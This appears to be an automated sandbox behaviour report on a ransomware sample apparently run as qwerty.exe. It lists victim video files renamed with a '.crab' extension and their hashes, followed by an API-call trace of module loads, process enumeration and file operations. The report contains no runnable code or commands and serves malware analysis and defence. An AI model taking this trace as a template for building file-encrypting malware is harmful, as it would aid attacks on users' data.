SHA256: 9da1322d4f76b604937aa520ddb1acfb05451bd942f9644ce19bf018ffc68cbb
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\soib.mp4.crab 14.77 KB MD5: 8147b5f0e3e065cd3b76477ab59f0cf9
SHA1: 72fa67c9c6245d3c9b41b5100c838c563c61220a
SHA256: f8b03c4166784ef5df70765714af5b3210708555cbb17f598cb1de941b5db5df
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\fuyv 5cjgyx2.flv.crab 26.13 KB MD5: cb465ed56818d04f0985e03a48a2b4b8
SHA1: e9d8614314d98f2003c06835ecd896b2c54ab7bb
SHA256: c3bdef3836ef49fc68cb39aebd129457ee6fca02b24467e08a2752048e10481b
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\gbpnutxd-3d.mkv.crab 7.93 KB MD5: 3eb5efe8997c9cbc7915cc2ef2fee42d
SHA1: 541ef6c84040a93bd508e697cc6e6a7a7d271c8e
SHA256: 76dd101cdcd45d6c43736261661dcc7f9313b2929b6f33c3f4a9d73e4cb49bd9
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\gvgh.mp4.crab 10.88 KB MD5: 02633b3554556507fa414e7b8630eb6e
SHA1: 843ddc8a7f274763f7a8fe5aadd5f78a32c43287
SHA256: 0e26de403a36c48b7e1a254cf53d090b423421a6fdb0e116910d9232dd5c7cd6
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\h7olyvsh.swf.crab 97.41 KB MD5: 221f2340ff31e1b38466c2e2b3ba4ee1
SHA1: c3e0ddb7a0c26acde3107b6269058bf8eb9d26dc
SHA256: 3f983a8e3d8f55af8a45080bbb05aa937c498a92d0243e1195a64348ce421be8
False
Threads
Thread 0xa48
375 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:51:36 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74540000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74cc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74540000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74cc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74cc1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74d447f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Load module_name = kernel32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x74cc168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74cc435f True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74cc1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74cc1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74cc10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74cc4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74cc3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7712d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74cc1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74cc7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74cc1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74cc1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x74cc1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74cc49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74cc1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74cc7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74cc34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x74ce7aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74cdc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74cc435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x74cc195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x74d4454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x74cc1328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x74d67bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x74cc469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x74cc51a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x74cc1450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77110fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77109d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x74cc4a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74cc192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x74cc170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x74cc51b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x74cc3531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x74cc4d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x74cc14b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74cc1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x74cc1725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x74cc3509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x74cc51e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x74cc51cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x74cc4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74cc5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x74ce772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x74cc87c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x74cc1916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74cdd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x74cc49ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x74cc11e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x74cc14fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x74cc3587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74cc34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x770f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x770f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x74cc4493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x74cc179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x74ced1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x74cc5189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x74cc495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x74ced1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77111f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x74cc1946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77103002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x74cc17b9 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x75592175 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75589679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x7558fc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75592320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x75587d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x755878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75587809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7558787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x755af170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7558b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75588a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75589a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75590dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x755e02bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75593559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x755920ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x75586ffe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75588332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x755890d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x75589785 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x770d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x77116d39 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74980000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7499c544 True 1
Fn
System Get Time type = System Time, time = 2018-06-04 08:51:37 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74cc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74cc359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74cc1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x74cc4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x74d4410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x74d44195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x74ccd31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x74cdee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7711441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7713c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7713c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x74cdf088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7713ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x770f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x771afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77141e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x74d44761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x74d3cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x74d4424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x74d446b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x74d56676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x74d44751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x74d565f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x74d447c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x74d447e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74d447f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x74cdeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 260 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 2
Fn
System Sleep duration = 200 milliseconds (0.200 seconds) True 1
Fn
Module Get Handle module_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, base_address = 0x400000 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x770d0000 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsMenu, address_out = 0x75595cb1 True 1
Fn
Window Set Attribute index = 0, new_long = 825373492 False 1
Fn
Window Create class_name = ExtraWnd1, wndproc_parameter = 0 True 1
Fn
Window Create class_name = ExtraWnd2, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 5
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74cc10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74cdd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x74cdd423 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x74cc4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x74cc2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x74cc4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x74cc103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x74cd195c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x74ce2b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74cc192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x74d4415b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x74ce8baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x74ce896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x74ce735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x770f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74cc1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x74cc4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x74cc1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x74cc5929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x74cd9af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x74cc4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x74cc54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x74cdd4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x74cd10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x74ccdd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74cc7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x74cc43e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x74cdc860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74cc49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x74cc5063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74cc1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77102c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74cc1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x771492b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x74cc418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x74ce828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74cc5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74cdd5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x74cc1909 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74cc1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7712d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74cc3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74cc4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74cc1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74cc34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x74cc1826 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74cc18f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x74cc196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x74cc1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x74ce2a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74cc1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74cc1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74cc1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x74cc424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x74ce3102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74cdc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x74cc168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x74cc5558 True 1
Fn
